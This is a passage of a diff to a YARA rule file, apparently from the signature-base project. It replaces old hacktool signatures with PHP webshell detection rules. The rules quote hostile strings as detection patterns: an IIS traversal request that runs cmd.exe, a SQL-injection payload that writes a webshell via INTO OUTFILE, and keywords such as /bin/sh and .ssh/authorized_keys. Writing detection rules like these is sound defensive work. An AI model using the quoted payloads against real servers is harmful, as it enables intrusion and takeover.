+		$mix = /['"](\w|\\x?[0-9a-f]{2,3})[\\x0-9a-f]{2,20}\\\d{1,3}[\\x0-9a-f]{2,20}\\x[0-9a-f]{2}\\/ wide ascii nocase
+		$php_short = "<?" wide ascii
+		$no_xml1 = "<?xml version" nocase wide ascii
+		$no_xml2 = "<?xml-stylesheet" nocase wide ascii
+		$no_asp1 = "<%@LANGUAGE" nocase wide ascii
+		$no_asp2 = /<script language="(vb|jscript|c#)/ nocase wide ascii
+		$no_pdf = "<?xpacket"
+		$php_new1 = /<\?=[^?]/ wide ascii
+		$php_new2 = "<?php" nocase wide ascii
+		$php_new3 = "<script language=\"php" nocase wide ascii
 
 	condition:
-		all of them
+		filesize < 700KB and ( ( ( $php_short in ( 0 .. 100 ) or $php_short in ( filesize -1000 .. filesize ) ) and not any of ( $no_* ) ) or any of ( $php_new* ) ) and any of ( $mix* )
 }
-rule SIGNATURE_BASE_Scanarator
+rule SIGNATURE_BASE_WEBSHELL_PHP_OBFUSC_Tiny : FILE
 {
 	meta:
-		description = "Auto-generated rule on file scanarator.exe"
-		author = "yarGen Yara Rule Generator by Florian Roth"
-		id = "dfc3ff29-03b4-58ca-bfe0-c6888fddab67"
-		date = "2025-04-14"
-		modified = "2025-04-14"
-		reference = "https://github.com/Neo23x0/signature-base"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/thor-hacktools.yar#L302-L312"
+		description = "PHP webshell obfuscated"
+		author = "Arnim Rupp (https://github.com/ruppde)"
+		id = "d78e495f-54d2-5f5f-920f-fb6612afbca3"
+		date = "2021-01-12"
+		modified = "2024-03-11"
+		reference = "Internal Research"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/gen_webshells.yar#L1249-L1344"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		hash = "848bd5a518e0b6c05bd29aceb8536c46"
-		logic_hash = "9400435470c26245cd814e1e39f275eb22566d66d1a72d4f3e618a6ad11bc8d9"
+		hash = "b7b7aabd518a2f8578d4b1bc9a3af60d155972f1"
+		hash = "694ec6e1c4f34632a9bd7065f73be473"
+		hash = "5c871183444dbb5c8766df6b126bd80c624a63a16cc39e20a0f7b002216b2ba5"
+		logic_hash = "993f1c98362dcbc207c6ceacb116a27d44505dc6dfa1874def780af50422e1b9"
 		score = 75
-		quality = 85
-		tags = ""
+		quality = -90
+		tags = "FILE"
+		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
+		importance = 70
 
 	strings:
-		$s4 = "GET /scripts/..%c0%af../winnt/system32/cmd.exe?/c+dir HTTP/1.0"
+		$obf1 = /\w'\.'\w/ wide ascii
+		$obf2 = /\w\"\.\"\w/ wide ascii
+		$obf3 = "].$" wide ascii
+		$gfp1 = "eval(\"return [$serialised_parameter"
+		$gfp2 = "$this->assert(strpos($styles, $"
+		$gfp3 = "$module = new $_GET['module']($_GET['scope']);"
+		$gfp4 = "$plugin->$_POST['action']($_POST['id']);"
+		$gfp5 = "$_POST[partition_by]($_POST["
+		$gfp6 = "$object = new $_REQUEST['type']($_REQUEST['id']);"
+		$gfp7 = "The above example code can be easily exploited by passing in a string such as"
+		$gfp8 = "Smarty_Internal_Debug::start_render($_template);"
+		$gfp9 = "?p4yl04d=UNION%20SELECT%20'<?%20system($_GET['command']);%20?>',2,3%20INTO%20OUTFILE%20'/var/www/w3bsh3ll.php"
+		$gfp10 = "[][}{;|]\\|\\\\[+=]\\|<?=>?"
+		$gfp11 = "(eval (getenv \"EPROLOG\")))"
+		$gfp12 = "ZmlsZV9nZXRfY29udGVudHMoJ2h0dHA6Ly9saWNlbnNlLm9wZW5jYXJ0LWFwaS5jb20vbGljZW5zZS5waHA/b3JkZXJ"
+		$php_short = "<?" wide ascii
+		$no_xml1 = "<?xml version" nocase wide ascii
+		$no_xml2 = "<?xml-stylesheet" nocase wide ascii
+		$no_asp1 = "<%@LANGUAGE" nocase wide ascii
+		$no_asp2 = /<script language="(vb|jscript|c#)/ nocase wide ascii
+		$no_pdf = "<?xpacket"
+		$php_new1 = /<\?=[^?]/ wide ascii
+		$php_new2 = "<?php" nocase wide ascii
+		$php_new3 = "<script language=\"php" nocase wide ascii
+		$cpayload1 = /\beval[\n\t ]{0,500}(\([^)]|\/\*)/ nocase wide ascii
+		$cpayload2 = /\bexec[\n\t ]{0,500}(\([^)]|\/\*)/ nocase wide ascii
+		$cpayload3 = /\bshell_exec[\n\t ]{0,500}(\([^)]|\/\*)/ nocase wide ascii
+		$cpayload4 = /\bpassthru[\n\t ]{0,500}(\([^)]|\/\*)/ nocase wide ascii
+		$cpayload5 = /\bsystem[\n\t ]{0,500}(\([^)]|\/\*)/ nocase wide ascii
+		$cpayload6 = /\bpopen[\n\t ]{0,500}(\([^)]|\/\*)/ nocase wide ascii
+		$cpayload7 = /\bproc_open[\n\t ]{0,500}(\([^)]|\/\*)/ nocase wide ascii
+		$cpayload8 = /\bpcntl_exec[\n\t ]{0,500}(\([^)]|\/\*)/ nocase wide ascii
+		$cpayload9 = /\bassert[\n\t ]{0,500}\([^)0]/ nocase wide ascii
+		$cpayload10 = /\bpreg_replace[\n\t ]{0,500}\([^\)]{1,100}\/[ismxADSUXju]{0,11}(e|\\x65)/ nocase wide ascii
+		$cpayload12 = /\bmb_ereg_replace[\t ]{0,500}\([^\)]{1,100}'e'/ nocase wide ascii
+		$cpayload13 = /\bmb_eregi_replace[\t ]{0,500}\([^\)]{1,100}'e'/ nocase wide ascii
+		$cpayload20 = /\bcreate_function[\n\t ]{0,500}(\([^)]|\/\*)/ nocase wide ascii
+		$cpayload21 = /\bReflectionFunction[\n\t ]{0,500}(\([^)]|\/\*)/ nocase wide ascii
+		$cpayload22 = /fetchall\(PDO::FETCH_FUNC[\n\t ]{0,500}[,}\)]/ nocase wide ascii
+		$m_cpayload_preg_filter1 = /\bpreg_filter[\n\t ]{0,500}(\([^\)]|\/\*)/ nocase wide ascii
+		$m_cpayload_preg_filter2 = "'|.*|e'" nocase wide ascii
 
 	condition:
-		all of them
+		filesize < 500 and not ( any of ( $gfp* ) ) and ( ( ( $php_short in ( 0 .. 100 ) or $php_short in ( filesize -1000 .. filesize ) ) and not any of ( $no_* ) ) or any of ( $php_new* ) ) and ( any of ( $cpayload* ) or all of ( $m_cpayload_preg_filter* ) ) and ( ( #obf1 + #obf2 ) > 2 or #obf3 > 10 )
 }
-rule SIGNATURE_BASE_Aolipsniffer
+rule SIGNATURE_BASE_WEBSHELL_PHP_OBFUSC_Str_Replace : FILE
 {
 	meta:
-		description = "Auto-generated rule on file aolipsniffer.exe"
-		author = "yarGen Yara Rule Generator by Florian Roth"
-		id = "f7cc0f31-6ba4-504b-82de-0334257b8a95"
-		date = "2025-04-14"
-		modified = "2025-04-14"
-		reference = "https://github.com/Neo23x0/signature-base"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/thor-hacktools.yar#L314-L332"
+		description = "PHP webshell which eval()s obfuscated string"
+		author = "Arnim Rupp (https://github.com/ruppde)"
+		id = "1f5b93c9-bdeb-52c7-a99a-69869634a574"
+		date = "2021-01-12"
+		modified = "2023-04-05"
+		reference = "Internal Research"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/gen_webshells.yar#L1346-L1401"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		hash = "51565754ea43d2d57b712d9f0a3e62b8"
-		logic_hash = "e627b8ea85e4325714c98e93ad6147adfa600af548a80dce8548b7f5743733b5"
+		hash = "691305753e26884d0f930cda0fe5231c6437de94"
+		hash = "7efd463aeb5bf0120dc5f963b62463211bd9e678"
+		hash = "fb655ddb90892e522ae1aaaf6cd8bde27a7f49ef"
+		hash = "d1863aeca1a479462648d975773f795bb33a7af2"
+		hash = "4d31d94b88e2bbd255cf501e178944425d40ee97"
+		hash = "e1a2af3477d62a58f9e6431f5a4a123fb897ea80"
+		logic_hash = "74fb86a7ee7342ede9f49ef004a92fb7bdf06ca62f8e8f0ea1c6adcff96bcb2d"
 		score = 75
-		quality = 85
-		tags = ""
+		quality = 21
+		tags = "FILE"
+		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
+		importance = 70
 
 	strings:
-		$s0 = "C:\\Program Files\\Microsoft Visual Studio\\VB98\\VB6.OLB"
-		$s1 = "dwGetAddressForObject"
-		$s2 = "Color Transfer Settings"
-		$s3 = "FX Global Lighting Angle"
-		$s4 = "Version compatibility info"
-		$s5 = "New Windows Thumbnail"
-		$s6 = "Layer ID Generator Base"
-		$s7 = "Color Halftone Settings"
-		$s8 = "C:\\WINDOWS\\SYSTEM\\MSWINSCK.oca"
+		$payload1 = "str_replace" fullword wide ascii
+		$payload2 = "function" fullword wide ascii
+		$goto = "goto" fullword wide ascii
+		$chr1 = "\\61" wide ascii
+		$chr2 = "\\112" wide ascii
+		$chr3 = "\\120" wide ascii
+		$php_short = "<?" wide ascii
+		$no_xml1 = "<?xml version" nocase wide ascii
+		$no_xml2 = "<?xml-stylesheet" nocase wide ascii
+		$no_asp1 = "<%@LANGUAGE" nocase wide ascii
+		$no_asp2 = /<script language="(vb|jscript|c#)/ nocase wide ascii
+		$no_pdf = "<?xpacket"
+		$php_new1 = /<\?=[^?]/ wide ascii
+		$php_new2 = "<?php" nocase wide ascii
+		$php_new3 = "<script language=\"php" nocase wide ascii
 
 	condition:
-		all of them
+		filesize < 300KB and ( ( ( $php_short in ( 0 .. 100 ) or $php_short in ( filesize -1000 .. filesize ) ) and not any of ( $no_* ) ) or any of ( $php_new* ) ) and any of ( $payload* ) and #goto > 1 and ( #chr1 > 10 or #chr2 > 10 or #chr3 > 10 )
 }
-rule SIGNATURE_BASE__Bitchin_Threads_
+rule SIGNATURE_BASE_WEBSHELL_PHP_OBFUSC_Fopo : FILE
 {
 	meta:
-		description = "Auto-generated rule on file =Bitchin Threads=.exe"
-		author = "yarGen Yara Rule Generator by Florian Roth"
-		id = "3a51e76c-b360-5f10-961c-ecc3ea3fa3c9"
-		date = "2025-04-14"
-		modified = "2025-04-14"
-		reference = "https://github.com/Neo23x0/signature-base"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/thor-hacktools.yar#L334-L345"
+		description = "PHP webshell which eval()s obfuscated string"
+		author = "Arnim Rupp (https://github.com/ruppde)"
+		id = "a298e99d-1ba8-58c8-afb9-fc988ea91e9a"
+		date = "2021-01-12"
+		modified = "2023-04-05"
+		reference = "Internal Research"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/gen_webshells.yar#L1403-L1463"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		hash = "7491b138c1ee5a0d9d141fbfd1f0071b"
-		logic_hash = "f43fec37d9dc668b562838465e5696e502c638b207e7af6a77fac5a8b00e92a8"
+		hash = "fbcff8ea5ce04fc91c05384e847f2c316e013207"
+		hash = "6da57ad8be1c587bb5cc8a1413f07d10fb314b72"
+		hash = "a698441f817a9a72908a0d93a34133469f33a7b34972af3e351bdccae0737d99"
+		logic_hash = "076c0c256e5951cdcb2b7bc55030f55bec48c1bea953b8bd85559a3230e387ae"
 		score = 75
-		quality = 85
-		tags = ""
+		quality = 15
+		tags = "FILE"
+		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
+		importance = 70
 
 	strings:
-		$s0 = "DarKPaiN"
-		$s1 = "=BITCHIN THREADS"
+		$payload = /(\beval[\t ]{0,500}\([^)]|\bassert[\t ]{0,500}\([^)])/ nocase wide ascii
+		$one1 = "7QGV2YWwo" wide ascii
+		$one2 = "tAZXZhbC" wide ascii
+		$one3 = "O0BldmFsK" wide ascii
+		$one4 = "sAQABlAHYAYQBsACgA" wide ascii
+		$one5 = "7AEAAZQB2AGEAbAAoA" wide ascii
+		$one6 = "OwBAAGUAdgBhAGwAKA" wide ascii
+		$two1 = "7QGFzc2VydC" wide ascii
+		$two2 = "tAYXNzZXJ0K" wide ascii
+		$two3 = "O0Bhc3NlcnQo" wide ascii
+		$two4 = "sAQABhAHMAcwBlAHIAdAAoA" wide ascii
+		$two5 = "7AEAAYQBzAHMAZQByAHQAKA" wide ascii
+		$two6 = "OwBAAGEAcwBzAGUAcgB0ACgA" wide ascii
+		$php_short = "<?" wide ascii
+		$no_xml1 = "<?xml version" nocase wide ascii
+		$no_xml2 = "<?xml-stylesheet" nocase wide ascii
+		$no_asp1 = "<%@LANGUAGE" nocase wide ascii
+		$no_asp2 = /<script language="(vb|jscript|c#)/ nocase wide ascii
+		$no_pdf = "<?xpacket"
+		$php_new1 = /<\?=[^?]/ wide ascii
+		$php_new2 = "<?php" nocase wide ascii
+		$php_new3 = "<script language=\"php" nocase wide ascii
 
 	condition:
-		all of them
+		filesize < 3000KB and ( ( ( $php_short in ( 0 .. 100 ) or $php_short in ( filesize -1000 .. filesize ) ) and not any of ( $no_* ) ) or any of ( $php_new* ) ) and $payload and ( any of ( $one* ) or any of ( $two* ) )
 }
-rule SIGNATURE_BASE_Cgis4_Cgis4
+rule SIGNATURE_BASE_WEBSHELL_PHP_Gzinflated : FILE
 {
 	meta:
-		description = "Auto-generated rule on file cgis4.exe"
-		author = "yarGen Yara Rule Generator by Florian Roth"
-		id = "98fbf445-b7a5-58fa-8f06-34be7321e2eb"
-		date = "2025-04-14"
-		modified = "2025-04-14"
-		reference = "https://github.com/Neo23x0/signature-base"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/thor-hacktools.yar#L347-L362"
+		description = "PHP webshell which directly eval()s obfuscated string"
+		author = "Arnim Rupp (https://github.com/ruppde)"
+		id = "9cf99ae4-9f7c-502f-9294-b531002953d6"
+		date = "2021-01-12"
+		modified = "2023-07-05"
+		reference = "Internal Research"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/gen_webshells.yar#L1465-L1538"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		hash = "d658dad1cd759d7f7d67da010e47ca23"
-		logic_hash = "2cf3fc6447323cbefe5f5ad02271eeb4c271bb9784d2c29030858542a43fbb04"
+		hash = "49e5bc75a1ec36beeff4fbaeb16b322b08cf192d"
+		hash = "6f36d201cd32296bad9d5864c7357e8634f365cc"
+		hash = "ab10a1e69f3dfe7c2ad12b2e6c0e66db819c2301"
+		hash = "a6cf337fe11fe646d7eee3d3f09c7cb9643d921d"
+		hash = "07eb6634f28549ebf26583e8b154c6a579b8a733"
+		logic_hash = "d2edb7050c986a00889fd01b709ec0aa1409ce2e40a15b7942562d12596b190e"
 		score = 75
-		quality = 85
-		tags = ""
+		quality = 32
+		tags = "FILE"
+		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
+		importance = 70
 
 	strings:
-		$s0 = ")PuMB_syJ"
-		$s1 = "&,fARW>yR"
-		$s2 = "m3hm3t_rullaz"
-		$s3 = "7Projectc1"
-		$s4 = "Ten-GGl\""
-		$s5 = "/Moziqlxa"
+		$payload2 = /eval\s?\(\s?("\?>".)?gzinflate\s?\(\s?base64_decode\s?\(/ wide ascii nocase
+		$payload4 = /eval\s?\(\s?("\?>".)?gzuncompress\s?\(\s?(base64_decode|gzuncompress)/ wide ascii nocase
+		$payload6 = /eval\s?\(\s?("\?>".)?gzdecode\s?\(\s?base64_decode\s?\(/ wide ascii nocase
+		$payload7 = /eval\s?\(\s?base64_decode\s?\(/ wide ascii nocase
+		$payload8 = /eval\s?\(\s?pack\s?\(/ wide ascii nocase
+		$fp1 = "YXBpLnRlbGVncmFtLm9"
+		$gfp1 = "eval(\"return [$serialised_parameter"
+		$gfp2 = "$this->assert(strpos($styles, $"
+		$gfp3 = "$module = new $_GET['module']($_GET['scope']);"
+		$gfp4 = "$plugin->$_POST['action']($_POST['id']);"
+		$gfp5 = "$_POST[partition_by]($_POST["
+		$gfp6 = "$object = new $_REQUEST['type']($_REQUEST['id']);"
+		$gfp7 = "The above example code can be easily exploited by passing in a string such as"
+		$gfp8 = "Smarty_Internal_Debug::start_render($_template);"
+		$gfp9 = "?p4yl04d=UNION%20SELECT%20'<?%20system($_GET['command']);%20?>',2,3%20INTO%20OUTFILE%20'/var/www/w3bsh3ll.php"
+		$gfp10 = "[][}{;|]\\|\\\\[+=]\\|<?=>?"
+		$gfp11 = "(eval (getenv \"EPROLOG\")))"
+		$gfp12 = "ZmlsZV9nZXRfY29udGVudHMoJ2h0dHA6Ly9saWNlbnNlLm9wZW5jYXJ0LWFwaS5jb20vbGljZW5zZS5waHA/b3JkZXJ"
+		$php_short = "<?" wide ascii
+		$no_xml1 = "<?xml version" nocase wide ascii
+		$no_xml2 = "<?xml-stylesheet" nocase wide ascii
+		$no_asp1 = "<%@LANGUAGE" nocase wide ascii
+		$no_asp2 = /<script language="(vb|jscript|c#)/ nocase wide ascii
+		$no_pdf = "<?xpacket"
+		$php_new1 = /<\?=[^?]/ wide ascii
+		$php_new2 = "<?php" nocase wide ascii
+		$php_new3 = "<script language=\"php" nocase wide ascii
 
 	condition:
-		all of them
+		filesize < 700KB and not ( any of ( $gfp* ) ) and ( ( ( $php_short in ( 0 .. 100 ) or $php_short in ( filesize -1000 .. filesize ) ) and not any of ( $no_* ) ) or any of ( $php_new* ) ) and 1 of ( $payload* ) and not any of ( $fp* )
 }
-rule SIGNATURE_BASE_Portscan
+rule SIGNATURE_BASE_WEBSHELL_PHP_OBFUSC_3 : FILE
 {
 	meta:
-		description = "Auto-generated rule on file portscan.exe"
-		author = "yarGen Yara Rule Generator by Florian Roth"
-		id = "967d6e3b-ae0d-5f93-a20d-742fc010608d"
-		date = "2025-04-14"
-		modified = "2025-04-14"
-		reference = "https://github.com/Neo23x0/signature-base"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/thor-hacktools.yar#L364-L375"
+		description = "PHP webshell which eval()s obfuscated string"
+		author = "Arnim Rupp (https://github.com/ruppde)"
+		id = "f2017e6f-0623-53ff-aa26-a479f3a02024"
+		date = "2021-04-17"
+		modified = "2024-12-09"
+		reference = "Internal Research"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/gen_webshells.yar#L1540-L1846"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		hash = "a8bfdb2a925e89a281956b1e3bb32348"
-		logic_hash = "d93b54ffc7416b5354304daf156908f11d7e320a91bd936e397a15ede63caae3"
-		score = 75
-		quality = 85
-		tags = ""
+		hash = "11bb1fa3478ec16c00da2a1531906c05e9c982ea"
+		hash = "d6b851cae249ea6744078393f622ace15f9880bc"
+		hash = "14e02b61905cf373ba9234a13958310652a91ece"
+		hash = "6f97f607a3db798128288e32de851c6f56e91c1d"
+		logic_hash = "aba86f6d8458bb119b9e495e6e77c1b89855bde31b12395a4d656878c5152932"
+		score = 70
+		quality = -198
+		tags = "FILE"
+		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
+		importance = 70
 
 	strings:
-		$s5 = "0    :SCAN BEGUN ON PORT:"
-		$s6 = "0    :PORTSCAN READY."
+		$obf1 = "chr(" wide ascii
+		$php_short = "<?" wide ascii
+		$no_xml1 = "<?xml version" nocase wide ascii
+		$no_xml2 = "<?xml-stylesheet" nocase wide ascii
+		$no_asp1 = "<%@LANGUAGE" nocase wide ascii
+		$no_asp2 = /<script language="(vb|jscript|c#)/ nocase wide ascii
+		$no_pdf = "<?xpacket"
+		$php_new1 = /<\?=[^?]/ wide ascii
+		$php_new2 = "<?php" nocase wide ascii
+		$php_new3 = "<script language=\"php" nocase wide ascii
+		$callback1 = /\bob_start[\n\t ]{0,500}(\([^)]|\/\*)/ nocase wide ascii
+		$callback2 = /\barray_diff_uassoc[\n\t ]{0,500}(\([^)]|\/\*)/ nocase wide ascii
+		$callback3 = /\barray_diff_ukey[\n\t ]{0,500}(\([^)]|\/\*)/ nocase wide ascii
+		$callback4 = /\barray_filter[\n\t ]{0,500}(\([^)]|\/\*)/ nocase wide ascii
+		$callback5 = /\barray_intersect_uassoc[\n\t ]{0,500}(\([^)]|\/\*)/ nocase wide ascii
+		$callback6 = /\barray_intersect_ukey[\n\t ]{0,500}(\([^)]|\/\*)/ nocase wide ascii
+		$callback7 = /\barray_map[\n\t ]{0,500}(\([^)]|\/\*)/ nocase wide ascii
+		$callback8 = /\barray_reduce[\n\t ]{0,500}(\([^)]|\/\*)/ nocase wide ascii
+		$callback9 = /\barray_udiff_assoc[\n\t ]{0,500}(\([^)]|\/\*)/ nocase wide ascii
+		$callback10 = /\barray_udiff_uassoc[\n\t ]{0,500}(\([^)]|\/\*)/ nocase wide ascii
+		$callback11 = /\barray_udiff[\n\t ]{0,500}(\([^)]|\/\*)/ nocase wide ascii
+		$callback12 = /\barray_uintersect_assoc[\n\t ]{0,500}(\([^)]|\/\*)/ nocase wide ascii
+		$callback13 = /\barray_uintersect_uassoc[\n\t ]{0,500}(\([^)]|\/\*)/ nocase wide ascii
+		$callback14 = /\barray_uintersect[\n\t ]{0,500}(\([^)]|\/\*)/ nocase wide ascii
+		$callback15 = /\barray_walk_recursive[\n\t ]{0,500}(\([^)]|\/\*)/ nocase wide ascii
+		$callback16 = /\barray_walk[\n\t ]{0,500}(\([^)]|\/\*)/ nocase wide ascii
+		$callback17 = /\bassert_options[\n\t ]{0,500}(\([^)]|\/\*)/ nocase wide ascii
+		$callback18 = /\buasort[\n\t ]{0,500}(\([^)]|\/\*)/ nocase wide ascii
+		$callback19 = /\buksort[\n\t ]{0,500}(\([^)]|\/\*)/ nocase wide ascii
+		$callback20 = /\busort[\n\t ]{0,500}(\([^)]|\/\*)/ nocase wide ascii
+		$callback21 = /\bpreg_replace_callback[\n\t ]{0,500}(\([^)]|\/\*)/ nocase wide ascii
+		$callback22 = /\bspl_autoload_register[\n\t ]{0,500}(\([^)]|\/\*)/ nocase wide ascii
+		$callback23 = /\biterator_apply[\n\t ]{0,500}(\([^)]|\/\*)/ nocase wide ascii
+		$callback24 = /\bcall_user_func[\n\t ]{0,500}(\([^)]|\/\*)/ nocase wide ascii
+		$callback25 = /\bcall_user_func_array[\n\t ]{0,500}(\([^)]|\/\*)/ nocase wide ascii
+		$callback26 = /\bregister_shutdown_function[\n\t ]{0,500}(\([^)]|\/\*)/ nocase wide ascii
+		$callback27 = /\bregister_tick_function[\n\t ]{0,500}(\([^)]|\/\*)/ nocase wide ascii
+		$callback28 = /\bset_error_handler[\n\t ]{0,500}(\([^)]|\/\*)/ nocase wide ascii
+		$callback29 = /\bset_exception_handler[\n\t ]{0,500}(\([^)]|\/\*)/ nocase wide ascii
+		$callback30 = /\bsession_set_save_handler[\n\t ]{0,500}(\([^)]|\/\*)/ nocase wide ascii
+		$callback31 = /\bsqlite_create_aggregate[\n\t ]{0,500}(\([^)]|\/\*)/ nocase wide ascii
+		$callback32 = /\bsqlite_create_function[\n\t ]{0,500}(\([^)]|\/\*)/ nocase wide ascii
+		$callback33 = /\bmb_ereg_replace_callback[\n\t ]{0,500}(\([^)]|\/\*)/ nocase wide ascii
+		$m_callback1 = /\bfilter_var[\n\t ]{0,500}(\([^)]|\/\*)/ nocase wide ascii
+		$m_callback2 = "FILTER_CALLBACK" fullword wide ascii
+		$cfp1 = /ob_start\(['\"]ob_gzhandler/ nocase wide ascii
+		$cfp2 = "IWPML_Backend_Action_Loader" ascii wide
+		$cfp3 = "<?phpclass WPML" ascii
+		$cfp4 = "      return implode('', "
+		$cpayload1 = /\beval[\n\t ]{0,500}(\([^)]|\/\*)/ nocase wide ascii
+		$cpayload2 = /\bexec[\n\t ]{0,500}(\([^)]|\/\*)/ nocase wide ascii
+		$cpayload3 = /\bshell_exec[\n\t ]{0,500}(\([^)]|\/\*)/ nocase wide ascii
+		$cpayload4 = /\bpassthru[\n\t ]{0,500}(\([^)]|\/\*)/ nocase wide ascii
+		$cpayload5 = /\bsystem[\n\t ]{0,500}(\([^)]|\/\*)/ nocase wide ascii
+		$cpayload6 = /\bpopen[\n\t ]{0,500}(\([^)]|\/\*)/ nocase wide ascii
+		$cpayload7 = /\bproc_open[\n\t ]{0,500}(\([^)]|\/\*)/ nocase wide ascii
+		$cpayload8 = /\bpcntl_exec[\n\t ]{0,500}(\([^)]|\/\*)/ nocase wide ascii
+		$cpayload9 = /\bassert[\n\t ]{0,500}\([^)0]/ nocase wide ascii
+		$cpayload10 = /\bpreg_replace[\n\t ]{0,500}\([^\)]{1,100}\/[ismxADSUXju]{0,11}(e|\\x65)/ nocase wide ascii
+		$cpayload12 = /\bmb_ereg_replace[\t ]{0,500}\([^\)]{1,100}'e'/ nocase wide ascii
+		$cpayload13 = /\bmb_eregi_replace[\t ]{0,500}\([^\)]{1,100}'e'/ nocase wide ascii
+		$cpayload20 = /\bcreate_function[\n\t ]{0,500}(\([^)]|\/\*)/ nocase wide ascii
+		$cpayload21 = /\bReflectionFunction[\n\t ]{0,500}(\([^)]|\/\*)/ nocase wide ascii
+		$cpayload22 = /fetchall\(PDO::FETCH_FUNC[\n\t ]{0,500}[,}\)]/ nocase wide ascii
+		$m_cpayload_preg_filter1 = /\bpreg_filter[\n\t ]{0,500}(\([^\)]|\/\*)/ nocase wide ascii
+		$m_cpayload_preg_filter2 = "'|.*|e'" nocase wide ascii
+		$cobfs1 = "gzinflate" fullword nocase wide ascii
+		$cobfs2 = "gzuncompress" fullword nocase wide ascii
+		$cobfs3 = "gzdecode" fullword nocase wide ascii
+		$cobfs4 = "base64_decode" fullword nocase wide ascii
+		$cobfs5 = "pack" fullword nocase wide ascii
+		$cobfs6 = "undecode" fullword nocase wide ascii
+		$gen_bit_sus1 = /:\s{0,20}eval}/ nocase wide ascii
+		$gen_bit_sus2 = /\.replace\(\/\w\/g/ nocase wide ascii
+		$gen_bit_sus6 = "self.delete"
+		$gen_bit_sus9 = "\"cmd /c" nocase
+		$gen_bit_sus10 = "\"cmd\"" nocase
+		$gen_bit_sus11 = "\"cmd.exe" nocase
+		$gen_bit_sus12 = "%comspec%" wide ascii
+		$gen_bit_sus13 = "%COMSPEC%" wide ascii
+		$gen_bit_sus18 = "Hklm.GetValueNames();" nocase
+		$gen_bit_sus19 = "http://schemas.microsoft.com/exchange/" wide ascii
+		$gen_bit_sus21 = "\"upload\"" wide ascii
+		$gen_bit_sus22 = "\"Upload\"" wide ascii
+		$gen_bit_sus23 = "UPLOAD" fullword wide ascii
+		$gen_bit_sus24 = "fileupload" wide ascii
+		$gen_bit_sus25 = "file_upload" wide ascii
+		$gen_bit_sus29 = "ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789" fullword wide ascii
+		$gen_bit_sus29b = "abcdefghijklmnopqrstuvwxyz234567" fullword wide ascii
+		$gen_bit_sus30 = "serv-u" wide ascii
+		$gen_bit_sus31 = "Serv-u" wide ascii
+		$gen_bit_sus32 = "Army" fullword wide ascii
+		$gen_bit_sus33 = /\$_(GET|POST|REQUEST)\["\w"\]/ fullword wide ascii
+		$gen_bit_sus34 = "Content-Transfer-Encoding: Binary" wide ascii
+		$gen_bit_sus35 = "crack" fullword wide ascii
+		$gen_bit_sus44 = "<pre>" wide ascii
+		$gen_bit_sus45 = "<PRE>" wide ascii
+		$gen_bit_sus46 = "shell_" wide ascii
+		$gen_bit_sus50 = "bypass" wide ascii
+		$gen_bit_sus52 = " ^ $" wide ascii
+		$gen_bit_sus53 = ".ssh/authorized_keys" wide ascii
+		$gen_bit_sus55 = /\w'\.'\w/ wide ascii
+		$gen_bit_sus56 = /\w\"\.\"\w/ wide ascii
+		$gen_bit_sus57 = "dumper" wide ascii
+		$gen_bit_sus59 = "'cmd'" wide ascii
+		$gen_bit_sus60 = "\"execute\"" wide ascii
+		$gen_bit_sus61 = "/bin/sh" wide ascii
+		$gen_bit_sus62 = "Cyber" wide ascii
+		$gen_bit_sus63 = "portscan" fullword wide ascii
+		$gen_bit_sus66 = "whoami" fullword wide ascii
+		$gen_bit_sus67 = "$password='" fullword wide ascii
+		$gen_bit_sus68 = "$password=\"" fullword wide ascii
+		$gen_bit_sus69 = "$cmd" fullword wide ascii
+		$gen_bit_sus70 = "\"?>\"." fullword wide ascii
+		$gen_bit_sus71 = "Hacking" fullword wide ascii
+		$gen_bit_sus72 = "hacking" fullword wide ascii
+		$gen_bit_sus73 = ".htpasswd" wide ascii
+		$gen_bit_sus74 = /\btouch\(\$[^,]{1,30},/ wide ascii
+		$gen_much_sus7 = "Web Shell" nocase
+		$gen_much_sus8 = "WebShell" nocase
+		$gen_much_sus3 = "hidded shell"
+		$gen_much_sus4 = "WScript.Shell.1" nocase
+		$gen_much_sus5 = "AspExec"
+		$gen_much_sus14 = "\\pcAnywhere\\" nocase
+		$gen_much_sus15 = "antivirus" nocase
+		$gen_much_sus16 = "McAfee" nocase
+		$gen_much_sus17 = "nishang"
+		$gen_much_sus18 = "\"unsafe" fullword wide ascii
+		$gen_much_sus19 = "'unsafe" fullword wide ascii
+		$gen_much_sus24 = "exploit" fullword wide ascii
+		$gen_much_sus25 = "Exploit" fullword wide ascii
+		$gen_much_sus26 = "TVqQAAMAAA" wide ascii
